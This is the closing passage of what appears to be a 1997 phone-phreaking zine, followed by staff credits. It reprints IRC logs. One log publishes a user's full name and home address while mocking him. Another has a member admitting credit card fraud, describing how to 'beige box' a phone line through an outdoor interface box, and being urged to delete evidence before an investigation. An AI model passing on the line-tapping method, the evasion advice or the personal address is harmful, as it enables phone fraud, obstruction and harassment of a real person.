  3428. [1:31] <ZeR0-HeX> i mean 
  3429. [1:31] <ZeR0-HeX> borrowing!! 
  3430. [1:31] <ZeR0-HeX> you no what i mean 
  3431. [1:32] <ZeR0-HeX> i won't rip you off!! 
  3432. [1:32] <ZeR0-HeX> trust me!! 
  3433. [1:32] <ZeR0-HeX> does it only scan pictures or what? cause i don't have any pics! or is it like  
  3434.   a timed one, where you can just point it and it'll shoot 
  3435. <Keystroke> it scans all 
  3436. [1:33] <ZeR0-HeX> ok, kool 
  3437. [1:33] <ZeR0-HeX> color right? 
  3438. [1:33] <ZeR0-HeX> like the picture you have? 
  3439. <Keystroke> yes 
  3440. [1:33] <ZeR0-HeX> ok, kool 
  3441. [1:34] <ZeR0-HeX> when r u gonna send it?? 
  3442. <Keystroke> hmmm 
  3443. <Keystroke> soon 
  3444. <Keystroke> whats your # 
  3445. <Keystroke> well 
  3446. <Keystroke> when u need it? 
  3447. [1:35] <ZeR0-HeX> #? phone # 
  3448. [1:35] <ZeR0-HeX> is it next day air? 
  3449. <Keystroke> yes 
  3450. [1:35] <ZeR0-HeX> or what? 
  3451. <Keystroke> yes 
  3452. [1:36] <ZeR0-HeX> oh, ok..... 
  3453. [1:36] <ZeR0-HeX> hmm.. 
  3454. [1:36] <ZeR0-HeX> well uh. 
  3455. [1:36] <ZeR0-HeX> k, i got an idea 
  3456. <Keystroke> yes? 
  3457. [1:36] <ZeR0-HeX> think you can send it out tomorrow? 
  3458. <Keystroke> uhmmmmm 
  3459. <Keystroke> yes 
  3460. [1:37] <ZeR0-HeX> do you have like a box and all? 
  3461. <Keystroke> yes 
  3462. <Keystroke> :P 
  3463. <Keystroke> hehehe 
  3464. [1:38] <ZeR0-HeX> what/? 
  3465. [1:38] <ZeR0-HeX> what's os funny bout that 
  3466. [1:38] <ZeR0-HeX> hehe 
  3467. <Keystroke> i keep saying yes :P 
  3468. [1:39] <ZeR0-HeX> oh, :-) 
  3469. [1:39] <ZeR0-HeX> ok 
  3470. [1:39] <ZeR0-HeX> so i gess you must want my address then huh? 
  3471. [1:41] <ZeR0-HeX> i gess not 
  3472. [1:41] <ZeR0-HeX> :-) 
  3473. <Keystroke> sorry 
  3474. <Keystroke> :) 
  3475. <Keystroke> I was finding something 
  3476. <Keystroke> a txt file 
  3477. [1:44] <ZeR0-HeX> its ok 
  3478. <Keystroke> its very important and i lost it 
  3479. <Keystroke> brb 
  3480. [1:45] <ZeR0-HeX> oh ok, take ur time 
  3481. <Keystroke> yes! 
  3482. <Keystroke> found it 
  3483. [1:45] <ZeR0-HeX> :-) 
  3484. [1:46] <ZeR0-HeX> what is it? if you don't mind me asking? 
  3485. <Keystroke> someone sent it to me who was going on vacation 
  3486. <Keystroke> and told me to give it to someone else 
  3487. <Keystroke> by today :( 
  3488. <Keystroke> and cause my puter was broken, well.... 
  3489. [1:46] <ZeR0-HeX> oh 
  3490. <Keystroke> didnt get a chance to 
  3491. [1:47] <ZeR0-HeX> sowwery :-( 
  3492. <Keystroke> I found it now :) 
  3493. [1:47] <ZeR0-HeX> do you already have my address? 
  3494. <Keystroke> nope 
  3495. [1:47] <ZeR0-HeX> k 
  3496. [1:48] <ZeR0-HeX> gimme yours right after 
  3497. [1:48] <ZeR0-HeX> don't send me a bomb 
  3498. [1:48] <ZeR0-HeX> :-) 
  3499. <Keystroke> heheheh 
  3500. <Keystroke> Maybe not :P 
  3501. <Keystroke> j/k 
  3502. [1:48] <ZeR0-HeX> k 
  3503. [1:48] <ZeR0-HeX> here it is : Faraz Alam 
  3504. [1:48] <ZeR0-HeX> 9 Deerfield Dr. 
  3505. [1:48] <ZeR0-HeX> Ellington, CT 06029 
  3506. <Keystroke> okey 
  3507. [1:48] <ZeR0-HeX> don't 
  3508. [1:48] <ZeR0-HeX> wait..... 
  3509. <Keystroke> 192 Market Street 
  3510. <Keystroke> yes? 
  3511. <Keystroke> market street sucks 
  3512. [1:49] <ZeR0-HeX> is it gonna be deliveried during the daytime? 
  3513. [1:49] <ZeR0-HeX> what time? 
  3514. [1:49] <ZeR0-HeX> do you know? 
  3515. <Keystroke> umm hmm 
  3516. <Keystroke> when your mail comes? 
  3517. [1:49] <ZeR0-HeX> oh 
  3518. [1:49] <ZeR0-HeX> it comes then 
  3519. [1:49] <ZeR0-HeX> ok 
  3520. [1:49] <ZeR0-HeX> cause 
  3521. [1:49] <ZeR0-HeX> remembe 
  3522. [1:49] <ZeR0-HeX> r 
  3523. [1:49] <ZeR0-HeX> my religion 
  3524. [1:49] <ZeR0-HeX> my parents would be pissed if they saw a girls' name a on my letter 
  3525. <Keystroke> hehe 
  3526. <Keystroke> Ill write Bubba 
  3527. <Keystroke> from bubba 
  3528. [1:50] <ZeR0-HeX> (thinks he found a homepage fer his issues..) 
  3529. [1:50] <ZeR0-HeX> um 
  3530. [1:50] <ZeR0-HeX> how bout this 
  3531. [1:50] <ZeR0-HeX> have your address on it 
  3532. [1:50] <ZeR0-HeX> but right a guys name 
  3533. [1:50] <ZeR0-HeX> ok? 
  3534. <Keystroke> ok 
  3535. <Keystroke> cool 
  3536. <Keystroke> url? 
  3537. [1:50] <ZeR0-HeX> can you do that? 
  3538. [1:51] <ZeR0-HeX> www.tripod.com 
  3539. [1:51] <ZeR0-HeX> still looking 
  3540. <Keystroke> yup 
  3541. [1:51] <ZeR0-HeX> i need something that allows illegal activities 
  3542. <Keystroke> hmmmm 
  3543. [1:51] <ZeR0-HeX> or else they terminate it in a day after viewing it 
  3544. <Keystroke> something? 
  3545. <Keystroke> they? 
  3546. [1:52] <ZeR0-HeX> iv.Pages that promote illegal activity. 
  3547. [1:52] <ZeR0-HeX> the isp 
  3548. [1:52] <ZeR0-HeX> damn 
  3549. <Keystroke> i c :) 
  3550. [1:52] <ZeR0-HeX> hmmm... 
  3551. [1:52] <ZeR0-HeX> i'll take a chance and build the web site 
  3552. [1:52] <ZeR0-HeX> see what happens 
  3553. [1:52] <ZeR0-HeX> ok 
  3554. <Keystroke> hehe 
  3555. [1:52] <ZeR0-HeX> go on with ur address 
  3556. <Keystroke> good luck 
  3557. [1:53] <ZeR0-HeX> thanks :-) 
  3558. <Keystroke> np 
  3559. <Keystroke> ok 
  3560. <Keystroke> i go address the box now 
  3561. <Keystroke> bbl :) 
  3562. [1:53] <ZeR0-HeX> huh? 
  3563. [1:53] <ZeR0-HeX> gimme ur address 
  3564. [1:53] <ZeR0-HeX> ur gonna make the box now? 
  3565. [1:53] <ZeR0-HeX> at 1:54 am? :-) 
  3566. Session Close: Tue Jul 01 02:14:31 1997 
  3567.  
  3568. Session Start: Fri Jul 11 14:29:07 1997 
  3569. [14:29] <ZeR0-HeX> heyyyyyyyyyyyyyyyyyyyy!!!!!!! 
  3570. * Keystrike is away *BRB* 
  3571. [14:29] <ZeR0-HeX> ok 
  3572. [14:29] <ZeR0-HeX> you better!! i need to talk to you!! 
  3573. Session Close: Fri Jul 11 14:30:21 1997 
  3574.  
  3575. Session Start: Fri Jul 11 14:37:01 1997 
  3576. [14:37] <ZeR0-HeX> back yet? 
  3577. Session Close: Fri Jul 11 14:39:49 1997 
  3578.  
  3579. Session Start: Fri Jul 11 14:59:30 1997 
  3580. [14:59] <ZeR0-HeX> u there? 
  3581. Session Close: Fri Jul 11 14:59:38 1997 
  3582.  
  3583. Session Start: Fri Jul 11 16:04:03 1997 
  3584. [16:04] <ZeR0-HeX> hi, u there? 
  3585. Session Close: Fri Jul 11 16:04:24 1997 
  3586.  
  3587. Session Start: Fri Jul 11 16:19:04 1997 
  3588. [16:19] <ZeR0-HeX> hey u there???????!~!!!!!!!!!! 
  3589. Session Close: Fri Jul 11 16:19:09 1997 
  3590.  
  3591. 2. sho.log - shoelace telling Keystroke about his visit from the SS. 
  3592.  
  3593. [9:49] *** shoelace (funkdat@bull-max43.dynamic.usit.net) has joined #DowNINit 
  3594. [9:50] <shoelace> hi 
  3595. k0w.com 
  3596. [9:50] <shoelace> guess what happened this morning? 
  3597. <Keystroke> what? 
  3598. <Keystroke> u harass OCI? 
  3599. [9:50] <shoelace> i'll tell u in here 
  3600. [9:50] <shoelace> um 
  3601. [9:50] *** W sets mode: +o Keystroke 
  3602. [9:51] <shoelace> i was just awoken five minutes ago 
  3603. [9:51] *** Keystroke sets mode: +o shoelace 
  3604. <Keystroke> cool 
  3605. [9:51] <shoelace> and my mom told me that the secret service had just called  
  3606.    neeeding to talk to my dad 
  3607. [9:51] <shoelace> and she said, she being the secret service person 
  3608. [9:51] <shoelace> that our number keeps coming up on their screens 
  3609. [9:51] <shoelace> part two 
  3610. [9:51] <shoelace> first 
  3611. <Keystroke> :/ 
  3612. [9:52] <shoelace> why would my main line, the one being for my parents 
  3613. [9:52] <shoelace> come up on their screens, when the only thing i ever do is with my  
  3614.    computer line 
  3615. [9:52] <shoelace> fuck 
  3616. [9:52] <shoelace> fuc 
  3617. [9:52] <shoelace> fuck 
  3618. [9:52] <shoelace> part three 
  3619. [9:52] <shoelace> the first thing i thought of was my credit card fraud 
  3620. <Keystroke> what # did the secret service call from? ill prank em! 
  3621. [9:53] <shoelace> but how could that be it, if the only thing i have done is on MY  
  3622.    fone line? 
  3623. [9:53] <shoelace> hmmm.. 
  3624. <Keystroke> did u ever call NE1 rpom your parents #? 
  3625. [9:53] <shoelace> dont know 
  3626. [9:53] <shoelace> we dont have caller id 
  3627. <Keystroke> from 
  3628. <Keystroke> *69! :P 
  3629. <Keystroke> hmmmm 
  3630. <Keystroke> like 
  3631. [9:53] <shoelace> whats NE1? 
  3632. [9:53] <shoelace> oh 
  3633. <Keystroke> maybe they knew that was a puter line 
  3634. [9:53] <shoelace> anyone 
  3635. [9:53] <shoelace> fuck 
  3636. <Keystroke> if it only calls your ISP 
  3637. <Keystroke> and like the cc#'s 
  3638. [9:53] <shoelace> no 
  3639. [9:53] <shoelace> it calls friends also 
  3640. [9:53] <shoelace> fuck 
  3641. <Keystroke> they still know its not the main line 
  3642. [9:54] <shoelace> it *might* be about the voice mail that dr1x set up for me 
  3643. <Keystroke> what are their screens? 
  3644. [9:54] <shoelace> because Phrax had one, dr1x had one, i had one, and REailty had one 
  3645. <Keystroke> maybe 
  3646. <Keystroke> :/ 
  3647. <Keystroke> all i know is DONT TALK TO ME! 
  3648. <Keystroke> jk :P 
  3649. <Keystroke> maybe your parents did something 
  3650. [9:57] <shoelace> FUCK 
  3651. [9:57] <shoelace> MY MOM JUST CAME DOWN HERE 
  3652. [9:57] <shoelace> she said that this is the deal 
  3653. [9:57] <shoelace> someone has been prank calling the s. s. and leaving obsene  
  3654.    messages, and they sound like they are drunk 
  3655. [9:57] <shoelace> here is the deal.. 
  3656. [9:57] <shoelace> beige box 
  3657. [9:57] <shoelace> i DID find my box unscrewed the other day 
  3658. [9:57] <shoelace> no joke 
  3659. [9:58] <shoelace> Key 
  3660. [9:58] <shoelace> can u give me some advice? 
  3661. <Keystroke> sure 
  3662. <Keystroke> someone has been prank calling the s. s. and leaving obsene messages,  
  3663.   and they sound like they are drunk?!~! 
  3664. <Keystroke> werd 
  3665. <Keystroke> :( 
  3666. <Keystroke> beige box? 
  3667. <Keystroke> unscrewed? 
  3668. <Keystroke> what ya mean? 
  3669. <Keystroke> the NID? 
  3670. [10:00] <shoelace> nid? 
  3671. [10:00] <shoelace> fuck 
  3672. [10:00] <shoelace> thats what they say.. 
  3673. <Keystroke> what was unsecrewed? 
  3674. [10:00] <shoelace> ok 
  3675. <Keystroke> you were framed dude :/ 
  3676. [10:00] <shoelace> here in tennessee 
  3677. <Keystroke> yes? 
  3678. [10:01] <shoelace> there are the network interface boxes 
  3679. [10:01] <shoelace> u unscrew them 
  3680. [10:01] <shoelace> they are gray little boxes outside 
  3681. [10:01] <shoelace> u unscrew them 
  3682. [10:01] <shoelace> and open them up 
  3683. [10:01] <shoelace> and there is a small fone jack with a line in it 
  3684. [10:01] <shoelace> u take out the line 
  3685. [10:01] <shoelace> and plug in the fone 
  3686. [10:01] <shoelace> a cheap/easy beige box 
  3687. [10:01] <shoelace> goddamnit 
  3688. <Keystroke> yours was unsecrewed? 
  3689. <Keystroke> well 
  3690. [10:02] <shoelace> yes 
  3691. <Keystroke> its something done recently... 
  3692. [10:02] <shoelace> ja 
  3693. <Keystroke> cause the SS dosnt think its nething big 
  3694. <Keystroke> kids fooling around 
  3695. <Keystroke> its not like they are waiting 
  3696. <Keystroke> and think they can make a big bust 
  3697. <Keystroke> done yesterday, the day b4 or this morning 
  3698. <Keystroke> when was the NID open? 
  3699. <Keystroke> but now like 
  3700. <Keystroke> they may investiagte u 
  3701. <Keystroke> and find what u did with CC#'s 
  3702. [10:03] <shoelace> nah man 
  3703. [10:03] <shoelace> im gonna del everything 
  3704. [10:03] <shoelace> hide my redbox 
  3705. <Keystroke> u better 
  3706. [10:03] <shoelace> fucking del all my anarchist shit 
  3707. [10:03] <shoelace> delete fucking everything 
  3708. <Keystroke> uhm 
  3709. [10:03] <shoelace> I GN0 
  3710. <Keystroke> netscape too 
  3711. [10:04] <shoelace> I'LL HAX0R THEM 
  3712. [10:04] <shoelace> yea yea 
  3713. <Keystroke> when u did thoes conf's 
  3714. [10:04] <shoelace> and del all my 0-day pron 
  3715. <Keystroke> they were logged 
  3716. <Keystroke> hehe 
  3717. <Keystroke> did u use a proxy? 
  3718. [10:04] <shoelace> proxy? 
  3719. <Keystroke> umm hmm 
  3720. <Keystroke> did u connect directally? 
  3721. [10:04] <shoelace> no 
  3722. <Keystroke> how did u connect? 
  3723. [10:05] <shoelace> i didnt even use my own account 
  3724. [10:05] <shoelace> well i dialed in and all 
  3725. <Keystroke> good 
  3726. <Keystroke> thats ok 
  3727. <Keystroke> they wun look at that 
  3728. [10:05] <shoelace> good 
  3729. <Keystroke> hopefully 
  3730. <Keystroke> probably 
  3731. [10:06] <shoelace> yea 
  3732. [10:07] <shoelace> well 
  3733. [10:07] <shoelace> tell everyone to give me best wishes 
  3734. [10:07] <shoelace> im gonna go fix my computer so i dont get fucked over hard 
  3735. [10:07] <shoelace> see ya 
  3736. <Keystroke> k 
  3737. [10:07] *** shoelace has quit IRC (I'm the cherry on the top of your ice cream...) 
  3738. <Keystroke> :( 
  3739. <Keystroke> ill be back in an hour 
  3740. *** Retrieving #downinit channel info... 
  3741. [10:34] *** Justyfied (j_n3@ppp273.localnet.com) has joined #downinit 
  3742. [10:35] *** Justyfied has quit IRC (Leaving) 
  3743. [10:36] *** Barry has quit IRC (Ping timeout for Barry[martin.barry.edu]) 
  3744. [10:56] *** shoelace (~shoelace@BULL-MAX144.DYNAMIC.USIT.NET) has joined #DowNINit 
  3745. [10:57] <shoelace> Key 
  3746. <Keystroke> hihi 
  3747. [10:58] <shoelace> i have a new thing 
  3748. [10:58] <shoelace> i called my old vmb that dr1x set up for me 
  3749. <Keystroke> i c 
  3750. [10:58] <shoelace> and cussed some guy out saying to change my password back a while  
  3751.    ago 
  3752. <Keystroke> :/ 
  3753. [10:59] <shoelace> do you think that could be anything about it? 
  3754. <Keystroke> naaaa 
  3755. [10:59] <shoelace> FUCK 
  3756. [10:59] *** shoelace has quit IRC (GOTTA CHANGE MY USER ID TO FUNKDAT, BRB) 
  3757. [11:01] *** shoelace (~funkdat@BULL-MAX144.DYNAMIC.USIT.NET) has joined #DowNINit 
  3758. <Keystroke> why new ident? 
  3759. [11:02] <shoelace> whY? 
  3760. [11:02] <shoelace> because the bots read funkdat 
  3761. [11:02] <shoelace> not shoelace 
  3762. <Keystroke> i c 
  3763. <Keystroke> heh 
  3764. [11:04] <shoelace> fuck 
  3765. [11:04] <shoelace> heeh 
  3766. [11:04] <shoelace> thanks for the note 
  3767. [11:04] <shoelace> heh 
  3768. <Keystroke> np 
  3769. <Keystroke> heheh 
  3770. [11:07] *** shoelace has quit IRC (gots ta go get mah liscense ta dr1v3...  
  3771. KEY$^@@$^# PRAY FOR ME WITH THE S. S. THING$#^#$^#$^ and tell Tcon about it$@^^$$%) 
  3772.  
  3773.  
  3774. _____________________________________________________________ 
  3775.          
  3776.         ------------------------                  ---------------------- 
  3777.          -[HAVOC Bell Systems]-                  -[Acknowledgements]- 
  3778.         ------------------------                  ---------------------- 
  3779.  
  3780. ArcAngl   : Just joined up 
  3781. Agrajag   : Back from the dead           btm       : Elite 
  3782. darkcyde  : #phreak old-schooler         digipimp  : Co-conspirator 
  3783. Digital_X : Nemesis (MIA?)               dr1x      : It's 420! 
  3784. disc0re   : Thinks were on NBC           ec|ipse   : Hysterical b1tch 
  3785. Keystroke : Submissions Editor           shamrock  : paranoid b1tch 
  3786. KungFuFox : Helped Reform #phreak        RBCP      : Funniest man alive 
  3787. memor     : Ueberleet French phreak      shoelace  : visited by the SS 
  3788. psych0    : Lame ass mofo                WeatherM  : anarchist 
  3789. REality   : Owns Own3r                   darc      : Left #phreak 
  3790. Scud-O    : Laid off from Wal-Mart       JP        : the man with connections 
  3791. Redtyde   : #phreak not so old-schooler  tombin    : phear da b1tch! 
  3792. theLURK3R : Incarerated                  antifire  : NT security guru 
  3793. UnaBomber : Tired of IRC (MIA?)          WaRsPrItE : #phreak WAY old-schooler             
  3794.                                                                  FH        : want scud to have ICQ                                       
  3795.          -------------------                TMessiah  : Likes PGP 
  3796.            -[ Channels ]-                   Revelation: old schooler 
  3797.          -------------------                Modify    : Lives near Scud-O 
  3798.   #phreak     : Home Sweet Home          |Banshee| : is a hick 
  3799.   #sin        : SIN Home                 mC        : infected.com - nuff said! 
  3800.   #hackphreak : cool channel             silitoad  : Did ya like thtj? 
  3801.                                                                  Phrax     : Cell guy 
  3802.                                                                   
  3803.    
  3804. _____________________________________________________________ 
  3805.  
  3806. Issue 14 is out September 1st! 
  3807.  
  3808. Send all articles for issue 13 to Keystroke at: keystroke@thepentagon.com 
  3809.  
  3810.            Tune in next time, Same Bat Time, Same Bat Channel! 
  3811.  
  3812.   ========================================================== 
  3813.   = Is this copy of The HAVOC Technical Journal skunked?   =  
  3814.   = If this file doesn't read at 155344 bytes, it probably =  
  3815.   = doesn't have a born on date! Get a fresh copy from our =  
  3816.   = NEW site at:      http://www.thtj.com                  = 
  3817.   ========================================================== 
  3818.             
  3819.                                         -[End of Communique]- 
  3820.  
  3821.  
  3822.